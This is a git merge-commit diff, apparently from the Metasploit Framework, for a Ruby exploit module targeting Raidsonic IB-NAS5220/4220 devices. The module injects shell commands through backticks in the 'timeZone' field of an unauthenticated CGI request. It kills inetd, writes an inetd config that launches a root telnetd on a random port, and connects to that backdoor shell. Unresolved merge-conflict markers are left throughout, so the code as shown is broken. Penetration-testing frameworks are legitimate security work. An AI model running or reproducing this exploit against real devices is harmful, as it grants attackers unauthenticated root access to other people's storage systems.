Merge branch 'raidsonic_telnet' of https://github.com/jvazquez-r7/metasploit-framework into raidsonic-ib5220-exec
Conflicts: modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rbbug/bundler_fix
m-1-k-3
commit
9ae977ec80
|
|
@ -14,6 +14,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Auxiliary::CommandShell
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
RESPONSE_PATTERN = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Raidsonic NAS Devices Unauthenticated Remote Command Execution',
|
||||
|
|
@ -22,8 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
interface. The vulnerability exists in timeHandler.cgi, which is accessible without
|
||||
authentication. This module has been tested with the versions IB-NAS5220 and
|
||||
IB-NAS4220.
|
||||
Two target are included, first to start a telnetd service and establish a session over
|
||||
it and second to run commands via the CMD target.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
|
@ -76,17 +76,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def banner_timeout
|
||||
(datastore['TelnetBannerTimeout'] || 25).to_i
|
||||
<<<<<<< HEAD
|
||||
end
|
||||
|
||||
def exploit
|
||||
@response_pattern = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
|
||||
exploit_telnet
|
||||
=======
|
||||
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
|
||||
end
|
||||
|
||||
def exploit_telnet
|
||||
telnetport = rand(65535)
|
||||
def exploit
|
||||
telnet_port = rand(65535)
|
||||
|
||||
<<<<<<< HEAD
|
||||
print_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
|
||||
=======
|
||||
print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}")
|
||||
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
|
||||
|
||||
#first request
|
||||
cmd = "killall inetd"
|
||||
|
|
@ -95,20 +102,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res = request(cmd)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
#second request
|
||||
inetd_cfg = rand_text_alpha(8)
|
||||
cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
|
||||
cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
|
||||
cmd = Rex::Text.uri_encode(cmd)
|
||||
print_status("#{rhost}:#{rport} - sending second request - configure inetd")
|
||||
register_file_for_cleanup("/tmp/#{inetd_cfg}")
|
||||
|
||||
res = request(cmd)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
|
|
@ -119,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res = request(cmd)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
|
|
@ -131,17 +138,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res = request(cmd)
|
||||
#no server header or something that we could use to get sure the command is executed
|
||||
if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
|
||||
if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
begin
|
||||
print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
|
||||
<<<<<<< HEAD
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
|
||||
=======
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i })
|
||||
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
|
||||
|
||||
if sock.nil?
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
|
||||
end
|
||||
|
||||
<<<<<<< HEAD
|
||||
print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
|
||||
auth_info = {
|
||||
:host => rhost,
|
||||
|
|
@ -153,6 +165,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:active => true
|
||||
}
|
||||
report_auth_info(auth_info)
|
||||
=======
|
||||
print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
|
||||
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
|
||||
prompt = negotiate_telnet(sock)
|
||||
if prompt.nil?
|
||||
sock.close
|
||||
|
|
@ -161,8 +176,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_good("#{rhost}:#{rport} - Telnet session successfully established...")
|
||||
end
|
||||
|
||||
<<<<<<< HEAD
|
||||
sock.put(user)
|
||||
sock.put("\r\n")
|
||||
=======
|
||||
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
|
||||
handler(sock)
|
||||
rescue
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
|
||||
|
|
@ -181,19 +199,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#not working without setting encode_params to false!
|
||||
'encode_params' => false,
|
||||
'vars_post' => {
|
||||
"month" => "#{rand(12)}",
|
||||
"date" => "#{rand(30)}",
|
||||
"year" => "20#{rand(99)}",
|
||||
"hour" => "#{rand(12)}",
|
||||
"minute" => "#{rand(60)}",
|
||||
"ampm" => "PM",
|
||||
"timeZone" => "Amsterdam`#{cmd}`",
|
||||
"ntp_type" => "default",
|
||||
"ntpServer" => "none",
|
||||
"old_date" => " 1 12007",
|
||||
"old_time" => "1210",
|
||||
"month" => "#{rand(12)}",
|
||||
"date" => "#{rand(30)}",
|
||||
"year" => "20#{rand(99)}",
|
||||
"hour" => "#{rand(12)}",
|
||||
"minute" => "#{rand(60)}",
|
||||
"ampm" => "PM",
|
||||
"timeZone" => "Amsterdam`#{cmd}`",
|
||||
"ntp_type" => "default",
|
||||
"ntpServer" => "none",
|
||||
"old_date" => " 1 12007",
|
||||
"old_time" => "1210",
|
||||
"old_timeZone" => "Amsterdam",
|
||||
"renew" => "0"
|
||||
"renew" => "0"
|
||||
}
|
||||
})
|
||||
return res
|
||||
|
|
@ -201,13 +219,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
|
||||
end
|
||||
end
|
||||
<<<<<<< HEAD
|
||||
def negotiate_telnet(sock)
|
||||
=======
|
||||
|
||||
def negotiate_telnet(sock)
|
||||
login = read_telnet(sock, "login: $")
|
||||
if login
|
||||
sock.put("#{user}\r\n")
|
||||
end
|
||||
return read_telnet(sock, "> $")
|
||||
end
|
||||
|
||||
def read_telnet(sock, pattern)
|
||||
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
|
||||
begin
|
||||
Timeout.timeout(banner_timeout) do
|
||||
while(true)
|
||||
data = sock.get_once(-1, tel_timeout)
|
||||
return nil if not data or data.length == 0
|
||||
<<<<<<< HEAD
|
||||
if data =~ /login/
|
||||
=======
|
||||
if data =~ /#{pattern}/
|
||||
>>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2
|
||||
return true
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue